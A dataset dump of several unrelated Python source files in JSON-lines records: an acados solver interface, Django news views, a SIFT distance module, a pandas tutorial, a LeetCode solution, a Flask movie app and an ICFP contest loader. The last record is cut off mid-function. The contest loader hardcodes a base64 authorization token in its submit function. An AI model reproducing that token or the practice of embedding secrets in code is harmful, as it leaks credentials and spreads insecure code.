type(idxsbx_e) == np.ndarray:\n self.__idxsbx_e = idxsbx_e\n else:\n raise Exception('Invalid idxsbx_e value. Exiting.')\n\n @lsh_e.setter\n def lsh_e(self, lsh_e):\n if type(lsh_e) == np.ndarray:\n self.__lsh_e = lsh_e\n else:\n raise Exception('Invalid lsh_e value. Exiting.')\n\n @ush_e.setter\n def ush_e(self, ush_e):\n if type(ush_e) == np.ndarray:\n self.__ush_e = ush_e\n else:\n raise Exception('Invalid ush_e value. Exiting.')\n\n @idxsh_e.setter\n def idxsh_e(self, idxsh_e):\n if type(idxsh_e) == np.ndarray:\n self.__idxsh_e = idxsh_e\n else:\n raise Exception('Invalid idxsh_e value. Exiting.')\n\n @lg.setter\n def lg(self, lg):\n if type(lg) == np.ndarray:\n self.__lg = lg\n else:\n raise Exception('Invalid lg value. Exiting.')\n\n @ug.setter\n def ug(self, ug):\n if type(ug) == np.ndarray:\n self.__ug = ug\n else:\n raise Exception('Invalid ug value. Exiting.')\n\n @lh.setter\n def lh(self, lh):\n if type(lh) == np.ndarray:\n self.__lh = lh\n else:\n raise Exception('Invalid lh value. Exiting.')\n\n @uh.setter\n def uh(self, uh):\n if type(uh) == np.ndarray:\n self.__uh = uh\n else:\n raise Exception('Invalid uh value. Exiting.')\n\n @D.setter\n def D(self, D):\n if type(D) == np.ndarray:\n self.__D = D\n else:\n raise Exception('Invalid D value. Exiting.')\n\n @C.setter\n def C(self, C):\n if type(C) == np.ndarray:\n self.__C = C\n else:\n raise Exception('Invalid C value. Exiting.')\n\n @C_e.setter\n def C_e(self, C_e):\n if type(C_e) == np.ndarray:\n self.__C_e = C_e\n else:\n raise Exception('Invalid C_e value. Exiting.')\n\n @lbx_e.setter\n def lbx_e(self, lbx_e):\n if type(lbx_e) == np.ndarray:\n self.__lbx_e = lbx_e\n else:\n raise Exception('Invalid lbx_e value. Exiting.')\n\n @ubx_e.setter\n def ubx_e(self, ubx_e):\n if type(ubx_e) == np.ndarray:\n self.__ubx_e = ubx_e\n else:\n raise Exception('Invalid ubx_e value. Exiting.')\n\n @idxbx_e.setter\n def idxbx_e(self, idxbx_e):\n if type(idxbx_e) == np.ndarray:\n self.__idxbx_e = idxbx_e\n else:\n raise Exception('Invalid idxbx_e value. Exiting.')\n\n @x0.setter\n def x0(self, x0):\n if type(x0) == np.ndarray:\n self.__x0 = x0\n else:\n raise Exception('Invalid x0 value. Exiting.')\n\n @p.setter\n def p(self, p):\n if type(p) == np.ndarray:\n self.__p = p\n else:\n raise Exception('Invalid p value. Exiting.')\n\n def set(self, attr, value):\n setattr(self, attr, value)\n\nclass ocp_nlp_solver_config:\n \"\"\"\n class containing the description of the solver configuration\n \"\"\"\n def __init__(self):\n self.__qp_solver = 'PARTIAL_CONDENSING_HPIPM' #: qp solver to be used in the NLP solver\n self.__hessian_approx = 'GAUSS_NEWTON' #: hessian approximation\n self.__integrator_type = 'ERK' #: integrator type\n self.__tf = None #: prediction horizon\n self.__nlp_solver_type = 'SQP_RTI' #: NLP solver \n\n @property\n def qp_solver(self):\n return self.__qp_solver\n\n @property\n def hessian_approx(self):\n return self.__hessian_approx\n\n @property\n def integrator_type(self):\n return self.__integrator_type\n\n @property\n def nlp_solver_type(self):\n return self.__nlp_solver_type\n\n @qp_solver.setter\n def qp_solver(self, qp_solver):\n qp_solvers = ('PARTIAL_CONDENSING_HPIPM', 'PARTIAL_CONDENSING_QPOASES', \\\n 'FULL_CONDENSING_QPOASES', 'FULL_CONDENSING_HPIPM')\n\n if type(qp_solver) == str and qp_solver in qp_solvers:\n self.__qp_solver = qp_solver\n else:\n raise Exception('Invalid qp_solver value. Possible values are:\\n\\n' \\\n + ',\\n'.join(qp_solvers) + '.\\n\\nYou have: ' + qp_solver + '.\\n\\nExiting.')\n @property\n def tf(self):\n return self.__tf\n\n @hessian_approx.setter\n def hessian_approx(self, hessian_approx):\n hessian_approxs = ('GAUSS_NEWTON')\n\n if type(hessian_approx) == str and hessian_approx in hessian_approxs:\n self.__hessian_approx = hessian_approx\n else:\n raise Exception('Invalid hessian_approx value. Possible values are:\\n\\n' \\\n + ',\\n'.join(hessian_approxs) + '.\\n\\nYou have: ' + hessian_approx + '.\\n\\nExiting.')\n\n @integrator_type.setter\n def integrator_type(self, integrator_type):\n integrator_types = ('ERK', 'IRK')\n\n if type(integrator_type) == str and integrator_type in integrator_types:\n self.__integrator_type = integrator_type\n else:\n raise Exception('Invalid integrator_type value. Possible values are:\\n\\n' \\\n + ',\\n'.join(integrator_types) + '.\\n\\nYou have: ' + integrator_type + '.\\n\\nExiting.')\n\n @tf.setter\n def tf(self, tf):\n self.__tf = tf\n\n @nlp_solver_type.setter\n def nlp_solver_type(self, nlp_solver_type):\n nlp_solver_types = ('SQP', 'SQP_RTI')\n\n if type(nlp_solver_type) == str and nlp_solver_type in nlp_solver_types:\n self.__nlp_solver_type = nlp_solver_type\n else:\n raise Exception('Invalid nlp_solver_type value. Possible values are:\\n\\n' \\\n + ',\\n'.join(nlp_solver_types) + '.\\n\\nYou have: ' + nlp_solver_type + '.\\n\\nExiting.')\n\n def set(self, attr, value):\n setattr(self, attr, value)\n\nclass acados_ocp_nlp:\n \"\"\"\n class containing the full description if the optimal control problem\n \"\"\"\n def __init__(self):\n self.dims = ocp_nlp_dims()\n self.cost = ocp_nlp_cost()\n self.constraints = ocp_nlp_constraints()\n self.solver_config = ocp_nlp_solver_config()\n self.model_name = None \n self.con_p_name = None \n self.con_p_e_name = None \n self.con_h_name = None \n self.con_h_e_name = None \n # self.constants = {}\n self.acados_include_path = []\n self.acados_lib_path = []\n\n def set(self, attr, value):\n # tokenize string \n tokens = attr.split('_', 1)\n if len(tokens) > 1:\n setter_to_call = getattr(getattr(self, tokens[0]), 'set')\n else:\n setter_to_call = getattr(self, 'set')\n\n setter_to_call(tokens[1], value)\n return \n\ndef check_ra(ra):\n \"\"\"\n (DEPRECATED) function that checks the consistency of the optimal control description\n \"\"\"\n # TODO(andrea): dimensions check are already performed \n # on the JSON data and type checks should be enforced by the \n # property setters. Add extra checks here?\n return\n\ndef np_array_to_list(np_array):\n return np_array.tolist()\n\nclass ocp_nlp_as_object:\n def __init__(self, d):\n self.__dict__ = d\n\ndef dict2json(d):\n out = {}\n for k, v in d.items():\n if isinstance(v, dict):\n v = dict2json(v)\n\n v_type = str(type(v).__name__)\n # out_key = '__' + v_type + '__' + k.split('__', 1)[-1]\n out_key = k.split('__', 1)[-1]\n out[k.replace(k, out_key)] = v\n return out\n\ndef acados_ocp2json_layout(acados_ocp):\n \"\"\" Convert acados ocp nlp object JSON format by stripping the \n property mangling and adding array dimension info.\n ALL items of type String will be converted \n to type ndarrray!\n \n Parameters\n ----------\n acados_ocp : class\n object of type acados_ocp_nlp.\n \n Returns\n ------\n out: dict \n acados_layout\n \"\"\"\n ocp_nlp = acados_ocp\n ocp_nlp.cost = acados_ocp.cost.__dict__\n ocp_nlp.constraints = acados_ocp.constraints.__dict__\n ocp_nlp.solver_config = acados_ocp.solver_config.__dict__\n ocp_nlp.dims = acados_ocp.dims.__dict__\n ocp_nlp = ocp_nlp.__dict__\n json_layout = dict2json_layout(ocp_nlp)\n return json_layout\n\ndef dict2json_layout(d):\n \"\"\" Convert dictionary containing the description of \n of the ocp_nlp to JSON format by stripping the \n property mangling and adding array dimension info.\n ALL items of type String will be converted \n to type ndarrray!\n \n Parameters\n ----------\n d : dict\n dictionary containing the description of \n the ocp_nlp.\n \n Returns\n ------\n out: dict \n postprocessed dictionary.\n \"\"\"\n out = {}\n for k, v in d.items():\n if isinstance(v, dict):\n v = dict2json_layout(v)\n\n v_type = str(type(v).__name__)\n if v_type == 'list':\n v_type = 'ndarray'\n\n # add array number of dimensions?\n # if v_type == 'ndarray':\n # v_type = v_type + '_' + str(len(v.shape))\n out_key = k.split('__', 1)[-1]\n\n if isinstance(v, dict):\n out[k.replace(k, out_key)] = v \n else:\n out[k.replace(k, out_key)] = [v_type] \n \n return out\n\ndef cast_ocp_nlp(ocp_nlp, ocp_nlp_layout):\n \"\"\" MATLAB does not allow distinction between e.g a = [1,1,1] and b = [1,1,1].' \n or a = 1 and b = [1]. Hence, we need to do some postprocessing of the JSON \n file generated from MATLAB.\n \n Parameters\n ----------\n ocp_nlp : dict\n ocp_nlp dictionary to be postprocessed.\n \n ocp_nlp_layout : dict\n acados ocp_nlp target layout\n Returns\n ------\n out : dict\n postprocessed dictionary\n \"\"\"\n\n out = {}\n for k, v in ocp_nlp.items():\n if isinstance(v, dict):\n v = cast_ocp_nlp(v, ocp_nlp_layout[k])\n\n if 'ndarray' in ocp_nlp_layout[k]:\n if isinstance(v, int) or isinstance(v, float):\n v = np.array([v])\n out[k] = v\n return out \n\ndef json2dict(ocp_nlp, ocp_nlp_dims):\n # load JSON layout\n current_module = sys.modules[__name__]\n acados_path = os.path.dirname(current_module.__file__)\n with open(acados_path + '/acados_layout.json', 'r') as f:\n ocp_nlp_layout = json.load(f)\n\n out = json2dict_rec(ocp_nlp, ocp_nlp_dims, ocp_nlp_layout)\n return out\n\ndef json2dict_rec(ocp_nlp, ocp_nlp_dims, ocp_nlp_layout):\n \"\"\" convert ocp_nlp loaded JSON to dictionary. Mainly convert\n lists to arrays for easier handling.\n Parameters\n ---------\n ocp_nlp : dict \n dictionary loaded from JSON to be post-processed.\n \n ocp_nlp_dims : dict \n dictionary containing the ocp_nlp dimensions.\n\n ocp_nlp_layout : dict \n acados ocp_nlp layout.\n\n Returns\n -------\n out : dict \n post-processed dictionary.\n \"\"\"\n out = {}\n for k, v in ocp_nlp.items():\n if isinstance(v, dict):\n v = json2dict_rec(v, ocp_nlp_dims, ocp_nlp_layout[k])\n\n v_type__ = str(type(v).__name__)\n out_key = k.split('__', 1)[-1]\n v_type = out_key.split('__')[0]\n out_key = out_key.split('__', 1)[-1]\n if 'ndarray' in ocp_nlp_layout[k]:\n if isinstance(v, int) or isinstance(v, float):\n v = np.array([v])\n if v_type == 'ndarray' or v_type__ == 'list':\n dims_l = []\n dims_names = []\n dim_keys = ocp_nlp_layout[k][1]\n for item in dim_keys:\n dims_l.append(ocp_nlp_dims[item])\n dims_names.append(item)\n dims = tuple(dims_l)\n if v == []:\n # v = None\n try: \n v = np.reshape(v, dims)\n except: \n raise Exception('acados -- mismatching dimensions for field {0}. Provided data has dimensions {1}, while associated dimensions {2} are {3}'.format(out_key, [], dims_names, dims))\n # v = []\n else:\n v = np.array(v)\n v_dims = v.shape\n try: \n v = np.reshape(v, dims)\n except: \n raise Exception('acados -- mismatching dimensions for field {0}. Provided data has dimensions {1}, while associated dimensions {2} are {3}'.format(out_key, v_dims, dims_names, dims))\n out[k.replace(k, out_key)] = v\n return out\n","repo_name":"besticka/acados1","sub_path":"interfaces/acados_template/acados_template/acados_ocp_nlp.py","file_name":"acados_ocp_nlp.py","file_ext":"py","file_size_in_byte":34783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"73662797163","text":"from django.shortcuts import render, get_object_or_404, redirect\nfrom django.views.generic import ListView, DetailView, CreateView\nfrom django.http import HttpResponse\nfrom django.contrib.auth.mixins import LoginRequiredMixin\n\nfrom .models import News, Category\nfrom .forms import NewsForm, UserRegisterForm\nfrom django.urls import reverse_lazy\nfrom django.core.paginator import Paginator\nfrom django.contrib import messages\n\n\ndef register(request):\n if request.method == 'POST':\n form = UserRegisterForm(request.POST)\n if form.is_valid():\n form.save()\n messages.success(request, 'Вы успешно зарегистрировались')\n return redirect('login')\n else:\n messages.error(request, 'Ошибка регистрации')\n else:\n form = UserRegisterForm()\n return render(request, 'news/register.html', {\"form\": form})\n\n\ndef login(request):\n return render(request, 'news/login.html')\n\n\ndef test(request):\n objects = ['john1', 'paul2', 'george3', 'ringo4', 'john5', 'paul6', 'george7']\n paginator = Paginator(objects, 2)\n page_num = request.GET.get('page', 1)\n page_objects = paginator.get_page(page_num)\n return render(request, 'news/test.html', {'page_obj': page_objects})\n\nclass HomeNews(ListView):\n model = News\n template_name = 'news/home_news_list.html' # ссылка страницы\n context_object_name = 'news' # передача статичных данных\n # extra_context = {\"title\": \"Главная\"}\n paginate_by = 2\n\n def get_context_data(self, *, object_list=None, **kwargs):\n \"\"\" Передача динам данных \"\"\"\n context = super().get_context_data(**kwargs)\n context['title'] = 'Главная страница'\n return context\n\n def get_queryset(self):\n \"\"\" Уточннение запроса через фильтрацию данных \"\"\"\n return News.objects.filter(is_bublished=True).select_related('category')\n\n\n\nclass NewsByCategory(ListView):\n model = News\n template_name = 'news/home_news_list.html' # ссылка страницы\n context_object_name = 'news' # передача статичных данных\n allow_empty = False # вывод пустого списка\n\n def get_context_data(self, *, object_list=None, **kwargs):\n \"\"\" Передача динам данных \"\"\"\n context = super().get_context_data(**kwargs)\n context['title'] = Category.objects.get(pk=self.kwargs['category_id'])\n return context\n\n def get_queryset(self):\n \"\"\" Уточннение запроса через фильтрацию данных \"\"\"\n return News.objects.filter(category_id=self.kwargs['category_id'],\n is_bublished=True)\n\n\nclass ViewNews(DetailView):\n model = News\n context_object_name = 'news_item' # передача статичных данных\n # template_name = 'news/news_detail.html'\n # pk_url_kwarg = 'news_id'\n\nclass CreateNews(LoginRequiredMixin, CreateView):\n '''Класс создания новости'''\n form_class = NewsForm\n template_name = 'news/add_news.html'\n # success_url = reverse_lazy('main') # вариант с переводом на главную страницу после публикации новости\n\ndef index(request):\n news = News.objects.all()\n context = {\n 'news': news,\n 'title': 'Список новостей',\n }\n return render(request, 'news/index.html', context)\n\n\n# def get_category(request, category_id):\n# news = News.objects.filter(category_id=category_id)\n# category = Category.objects.get(pk=category_id)\n# context = {\n# 'news': news,\n# 'category': category\n# }\n# return render(request, 'news/category.html', context)\n\n\ndef view_news(request, news_id):\n # news_item = News.objects.get(pk=news_id)\n news_item = get_object_or_404(News, pk=news_id)\n context = {\n 'item': news_item\n }\n return render(request, 'news/view_news.html', context)\n\n# def add_news(request):\n# if request.method == 'POST':\n# form = NewsForm(request.POST)\n# if form.is_valid():\n# # print(form.cleaned_data)\n# # news = News.objects.create(**form.cleaned_data)\n# news = form.save()\n# return redirect(news)\n# else:\n# form = NewsForm()\n#\n# context = {\n# \"form\": form\n# }\n\n return render(request, 'news/add_news.html', context)","repo_name":"Maglctea/WebBlog","sub_path":"mysite/news/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"74322923243","text":"# -*- coding: utf-8 -*-\n\"\"\"Computes pairwise distances for SIFT histograms, pytohn implementation.\n\"\"\"\n\n#from wibc.config.wibc_config import cf\nimport numpy as np\nimport cPickle\n\n\nclass sift_pdist(object):\n \n def __init__(self, Dname):\n \"\"\"Loading data to memory.\n \"\"\"\n self.D = cPickle.load(open(Dname, 'rb'))\n \n def getA(self, N, THR=2):\n \"\"\"Get thresholded weighting matrix.\n \n Uses best settings from the article, THR=2.\n \"\"\"\n A = np.zeros((N,N), dtype=np.float64);\n for i in xrange(N):\n for j in xrange(max(0, i-THR+1), min(N, i+THR)):\n A[i,j] = 1 - float(abs(i-j))/THR\n return A\n \n def get_dist(self, P, Q, K, m=0.5):\n \"\"\"Distance function using np.argsort.\n \"\"\"\n A = self.getA(P.shape[0])\n Z = (P+Q).dot(A)\n Z = Z**m\n Z[Z==0] = 1\n D = (P-Q)/Z\n # calc only diagonal of dot operation, for multiple vectors at a time\n DA = D.dot(A)\n dist = np.einsum('ij,ji->i', DA, D.T)**0.5\n # getting the closest K members\n k_idx = np.argsort(dist)[:K]\n k_dist = dist[k_idx]\n return [k_idx, k_dist, np.mean(dist), np.std(dist)]\n\n def get_dist_1k(self, Pi):\n \"\"\"Get 1000 closest neighbours of descriptor Pi.\n \"\"\"\n P = self.D[Pi]\n res = [[]]*4\n res[0] = np.empty((0,))\n res[1] = np.empty((0,))\n for k in xrange(22):\n Q = self.D[k*50000:(k+1)*50000, :]\n r1 = self.get_dist(P, Q, K=1000)\n r1[0] += k*50000\n res[0] = np.hstack((res[0], r1[0]))\n res[1] = np.hstack((res[1], r1[1]))\n res[2].append(r1[2])\n res[3].append(r1[3])\n idx = np.argsort(res[1])[:1000]\n res[0] = res[0][idx]\n res[1] = res[1][idx]\n res[2] = np.mean(res[2])\n res[3] = np.mean(res[3])\n #return [k_idx, k_dist, np.mean(dist), np.std(dist)]\n return res","repo_name":"akusok/website-ibc","sub_path":"wibc/modules/sift_pdist.py","file_name":"sift_pdist.py","file_ext":"py","file_size_in_byte":1998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"71599661163","text":"# Pandas -- pip install pandas\n\n\n# filteration\n# analysis of data \n\nimport pandas \n\n# data = [\"Ramesh\",\"Suresh\",\"Mahesh\",\"venkatesh\",'rajesh','subash','vignesh']\n\n# info = pandas.DataFrame(data)\n\n# print(info)\n\n# print(type(info))\n\n# dict1 = {\n# \"teams\":[\"CSK\",\"RCB\",\"MI\",\"LSG\"],\n# \"players\":[\"Dhoni\",\"Kohli\",\"Rohit\",\"Rahul\"]\n# }\n\n# info = pandas.DataFrame(dict1)\n\n# print(info)\n\n# print(type(info))\n\n# read_csv\n# read_excel\n# read_json\ncsv_data = pandas.read_csv('sample_data.csv')\n\n# print(csv_data)\n\n# print(csv_data.loc[0:2]) # row based access.\n\n# print(csv_data.loc[[0,1,4]])\n\n# print(csv_data['name']) # column based access\n\n# print(csv_data)\n\ninfo = csv_data[csv_data['city']=='Hyderabad']\n\nprint(info)\n\n# info.to_csv(\"filtered_data.csv\",index=False)\n\ninfo.to_excel('sample.xlsx',index=False)\n\ninfo.to_json('sample_info.json',index=False,indent=4,orient='records')","repo_name":"sanjeevareddy91/python-8am-oct-2023","sub_path":"pandas_cls.py","file_name":"pandas_cls.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"42278899753","text":"from flask import Flask, render_template, redirect, url_for, request\nfrom flask_bootstrap import Bootstrap\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_wtf import FlaskForm\nfrom wtforms import StringField, SubmitField, FloatField\nfrom wtforms.validators import DataRequired\nimport requests\nimport os\n\nAPI_KEY = os.environ.get(\"MY_API_KEY\")\n\nAPI_URL = \"https://api.themoviedb.org/3/search/movie\"\nMOVIE_DB_IMAGE_URL = \"https://image.tmdb.org/t/p/w500\"\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = 'SECRET_APP_KEY'\nBootstrap(app)\n\n# CREATE DATABASE\napp.config['SQLALCHEMY_DATABASE_URI'] = \"sqlite:///movie-collection.db\"\n# Optional: But it will silence the deprecation warning in the console.\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\ndb = SQLAlchemy(app)\n\n\nclass AddMovie(FlaskForm):\n title = StringField(label=\"Movie Title\", validators=[DataRequired()])\n submit = SubmitField(label=\"Add Movie\")\n\n# created a class using FlaskForm\nclass RateMovieForm(FlaskForm):\n # label is what will be displayed\n rating = FloatField(label=\"Your rating out of 10 e.g 7.5\", validators=[DataRequired()])\n review = StringField(label=\"Your review\", validators=[DataRequired()])\n submit = SubmitField(label=\"Done\")\n\n\n# CREATE TABLE\nclass Movies(db.Model):\n id = db.Column(db.Integer, primary_key=True, autoincrement=True)\n title = db.Column(db.String(250), unique=True, nullable=False)\n year = db.Column(db.Integer, nullable=False)\n description = db.Column(db.String(350), nullable=False)\n rating = db.Column(db.Float, nullable=True)\n ranking = db.Column(db.Integer, nullable=True)\n review = db.Column(db.String(500), nullable=True)\n img_url = db.Column(db.String(500), nullable=False)\n\n# Allow each book object to be identified by its title when printed.\n def __repr__(self):\n return f''\n\n\nwith app.app_context():\n db.create_all()\n\n\n@app.route(\"/\")\ndef home():\n\n # This line creates a list of all the movies sorted by rating\n all_movies = Movies.query.order_by(Movies.rating).all()\n rows = Movies.query.count()\n # This line loops through all the movies\n for i in range(len(all_movies)):\n # This line gives each movie a new ranking reversed from their order in all_movies\n all_movies[i].ranking = len(all_movies) - i\n db.session.commit()\n return render_template(\"index.html\", num_of_movies=rows, movies=all_movies)\n\n\n@app.route(\"/edit\", methods=[\"GET\", \"POST\"])\ndef rate_movie():\n form = RateMovieForm()\n movie_id = request.args.get(\"id\")\n movie_selected = Movies.query.get(movie_id)\n if request.method == \"POST\":\n # UPDATE RECORD\n movie_to_update = Movies.query.get(movie_id)\n movie_to_update.rating = request.form[\"rating\"]\n movie_to_update.review = request.form[\"review\"]\n db.session.commit()\n return redirect(url_for('home'))\n return render_template(\"edit.html\", form=form, movie=movie_selected)\n\n\n@app.route(\"/delete\")\ndef delete():\n movie_id = request.args.get('id')\n movie_to_delete = Movies.query.get(movie_id)\n db.session.delete(movie_to_delete)\n db.session.commit()\n return redirect(url_for('home'))\n\n\n@app.route(\"/add\", methods=[\"GET\", \"POST\"])\ndef add_movie():\n form = AddMovie()\n if request.method == \"POST\":\n parameters = {\n \"api_key\": API_KEY,\n \"query\": form.title.data,\n }\n movies_response = requests.get(url=API_URL, params=parameters).json()\n print(movies_response)\n return render_template(\"select.html\", form=form, movies=movies_response, key=API_KEY)\n return render_template(\"add.html\", form=form)\n\n\n@app.route(\"/find\")\ndef find_movie():\n movie_api_id = request.args.get(\"id\")\n if movie_api_id:\n movie_api_url = f\"https://api.themoviedb.org/3/movie/{movie_api_id}\"\n response = requests.get(movie_api_url, params={\"api_key\": API_KEY, \"language\": \"en-US\"})\n data = response.json()\n print(data)\n new_movie = Movies(\n title=data[\"title\"],\n year=data[\"release_date\"].split(\"-\")[0],\n img_url=f\"{MOVIE_DB_IMAGE_URL}{data['poster_path']}\",\n description=data[\"overview\"]\n )\n\n db.session.add(new_movie)\n db.session.commit()\n return redirect(url_for(\"rate_movie\", id=new_movie.id))\n\n\nif __name__ == '__main__':\n app.run(port=4999, debug=True)","repo_name":"mayrapena1324/top-ten-movies","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"74483582442","text":"from DBConnect import *\nclass DocActions(object):\n\tdef __init__(self,medium):\n\t\t#0 youtube 1 vimeo\n\t\tself.medium=medium\n\tdef getAll(self):\n\t\tdb=DBConnect(\"meteor\")\n\t\tif self.medium==0:\n\t\t\tcursor = db.connect().randa_youtube_videos.find()\n\t\telif self.medium==1:\n\t\t\tcursor = db.connect().randa_vimeo_videos.find()\n\t\tfor document in cursor:\n\t\t\tprint(document)\n\tdef deleteAll(self):\n\t\tdb=DBConnect(\"meteor\")\n\t\tif self.medium==0:\n\t\t\tdb.connect().randa_youtube_videos.remove({})\n\t\telif self.medium==1:\n\t\t\tdb.connect().randa_vimeo_videos.remove({})\n\tdef createUniqueIndex(self):\n\t\tdb=DBConnect(\"meteor\")\n\t\tif self.medium==0:\n\t\t\tdb.connect().randa_youtube_videos.create_index([(\"randa_id\", 1)], unique=True)\n\t\telif self.medium==1:\n\t\t\tdb.connect().randa_vimeo_videos.create_index([(\"randa_id\", 1)], unique=True)","repo_name":"kaplanmaxe/randapanda","sub_path":"python/DocActions.py","file_name":"DocActions.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"71950328364","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[ ]:\n\n\n#Using Recusrsive approach\ndef power(a, N):\n if(N==0):\n return 1;\n elif N==1:\n return a;\n else:\n R = pow(a, N/2)\n if(N%2==0):\n return R*R;\n else:\n return R*a*R;\n \na = int(input(\"Enter a:\",))\nN = int(input(\"Enter N:\",))\npower(a, N)\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"manasupes/Coding-Problems","sub_path":"Fast_Exp.py","file_name":"Fast_Exp.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"20238947130","text":"# 1020. Number of Enclaves\n\n# You are given an m x n binary matrix grid, where 0 represents a sea cell and 1 represents a land cell.\n\n# A move consists of walking from one land cell to another adjacent (4-directionally) land cell or walking off the boundary of the grid.\n\n# Return the number of land cells in grid for which we cannot walk off the boundary of the grid in any number of moves.\n\n# Example 1:\n# Input: grid = [[0,0,0,0],[1,0,1,0],[0,1,1,0],[0,0,0,0]]\n# Output: 3\n# Explanation: There are three 1s that are enclosed by 0s, and one 1 that is not enclosed because its on the boundary.\n\n# Example 2:\n# Input: grid = [[0,1,1,0],[0,0,1,0],[0,0,1,0],[0,0,0,0]]\n# Output: 0\n# Explanation: All 1s are either on the boundary or can reach the boundary.\n\nfrom typing import List\n\n\nclass Solution:\n def numEnclaves(self, grid: List[List[int]]) -> int:\n directions = [\n [1, 0],\n [-1, 0],\n [0, 1],\n [0, -1],\n ]\n result = 0\n flag = True\n\n def recursive(i, j, count: List[str]):\n nonlocal flag\n if i < 0 or i >= len(grid) or j < 0 or j >= len(grid[0]):\n return\n if grid[i][j] == 0:\n return\n if i == 0 or i == len(grid)-1 or j == 0 or j == len(grid[0]) - 1:\n flag = False\n return\n count.append(f\"row{i}-col{j}\")\n grid[i][j] = 0\n for item in directions:\n recursive(i + item[0], j + item[1], count)\n\n for i in range(0, len(grid)):\n for j in range(0, len(grid[0])):\n if grid[i][j] == 1:\n count = []\n flag = True\n recursive(i, j, count)\n if flag:\n result = result + len(count)\n\n return result\n\n\n# test\ngrid = [\n [0, 1, 1, 0],\n [0, 0, 1, 0],\n [0, 0, 1, 0],\n [0, 0, 0, 0],\n]\nsolution = Solution()\nres = solution.numEnclaves(grid)\nprint(res)\n","repo_name":"HarryXiong24/code-collection","sub_path":"Data Structure & Algorithm/Algorithm/Search on 2-dimension Plane/DFS/1020. Number of Enclaves/1020. Number of Enclaves.py","file_name":"1020. Number of Enclaves.py","file_ext":"py","file_size_in_byte":2015,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"19"} +{"seq_id":"32548677554","text":"import sys\r\n\r\nstdin = sys.stdin\r\n\r\nns = lambda : stdin.readline().rstrip()\r\nni = lambda : int(ns())\r\nna = lambda : list(map(int, stdin.readline().split()))\r\n\r\n\r\ndef main():\r\n n = ni()\r\n a = na()\r\n a.sort()\r\n mid = n // 2\r\n if n % 2 == 0:\r\n y = sum(a[mid:])\r\n x = sum(a[:mid])\r\n else:\r\n y = sum(a[mid:])\r\n x = sum(a[:mid])\r\n \r\n print(y**2 + x**2)\r\nmain()","repo_name":"pto8913/KyoPro","sub_path":"CodeForces/CFR 594 div2/B.py","file_name":"B.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"41176252689","text":"#!/usr/bin/env python\nimport http.client\nimport json\nimport urllib.request\nimport urllib.parse\nimport ssl\nimport os.path\nimport sys\nfrom point import Pt\nfrom unit import Unit\nimport base64\n\nQUALIFIER_PROBLEM_URL = \"http://icfpcontest.org/problems/problem_{}.json\"\nLOCAL_PATH = \"qualifiers/{}.json\"\n\ndef get_problem_data(i):\n local = LOCAL_PATH.format(i)\n if os.path.exists(local):\n print(\"Loading qualifier {} from local cache...\".format(i), file=sys.stderr)\n with open(local) as f:\n return f.read()\n url = QUALIFIER_PROBLEM_URL.format(i)\n print(\"Loading {}...\".format(url), file=sys.stderr)\n return urllib.request.urlopen(url).read().decode(\"utf8\")\n\ndef get_qualifier_problems(*args):\n if len(args) == 0:\n args = range(24)\n problem_data = []\n for i in args:\n problem_data.append(loader(get_problem_data(i)))\n\n return problem_data\n\ndef submit(data):\n #context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)\n #context.verify_mode = ssl.CERT_REQUIRED\n #context.load_verify_locations('C:\\\\Users\\\\Matt\\\\cacert.pem')\n h = http.client.HTTPSConnection('davar.icfpcontest.org',443,context=ssl.create_default_context())\n # url_params = urllib.parse.urlencode(json.dumps(data))\n print(\"Submitting: \"+json.dumps(data), file=sys.stderr)\n headers = { 'Content-Type' : 'application/json', \"Authorization\" : 'Basic '+base64.b64encode(b\":lI/jYDtQwdrf4s+SDq6WW91LW5bXpH04ZWhIUI+clxo=\").decode(\"ascii\") }\n h.request('POST', '/teams/77/solutions', json.dumps(data), headers)\n r1 = h.getresponse()\n print(r1.status, r1.reason, file=sys.stderr)\n\ndef loader(input_data):\n data_filthy = json.loads(input_data)\n return cleanse(data_filthy)\n\ndef cleanse(data_filthy):\n data = {}\n data[\"id\"] = data_filthy.get(\"id\", -1)\n data[\"width\"] = data_filthy.get(\"width\", 0)\n data[\"height\"] = data_filthy.get(\"height\", 0)\n data[\"grid\"] = [[0 for x in range(data[\"width\"])] for y in range(data[\"height\"])]\n\n is_valid_point = lambda pt: (pt.x >= 0) and (pt.x < data[\"width\"]) and (pt.y >= 0) and (pt.y < data[\"height\"])\n\n for point in data_filthy.get(\"filled\", []):\n p = Pt(int(point.get(\"x\", -1)), int(point.get(\"y\", -1)))\n assert is_valid_point(p)\n data[\"grid\"][p.y][p.x] = 1\n\n data[\"sourceLength\"] = data_filthy.get(\"sourceLength\", 0)\n data[\"sourceSeeds\"] = data_filthy.get(\"sourceSeeds\", [])\n data[\"units\"] = []\n for unit in data_filthy.get(\"units\"):\n \n assert (\"pivot\" in unit)\n pivot_p = Pt(int(unit[\"pivot\"].get(\"x\", -1)), int(unit[\"pivot\"].get(\"y\", -1)))\n assert is_valid_point(pivot_p)\n\n members = []\n for member in unit.get(\"members\", []):\n member_p = Pt(int(member.get(\"x\", -1)), member.get(\"y\", -1))\n assert 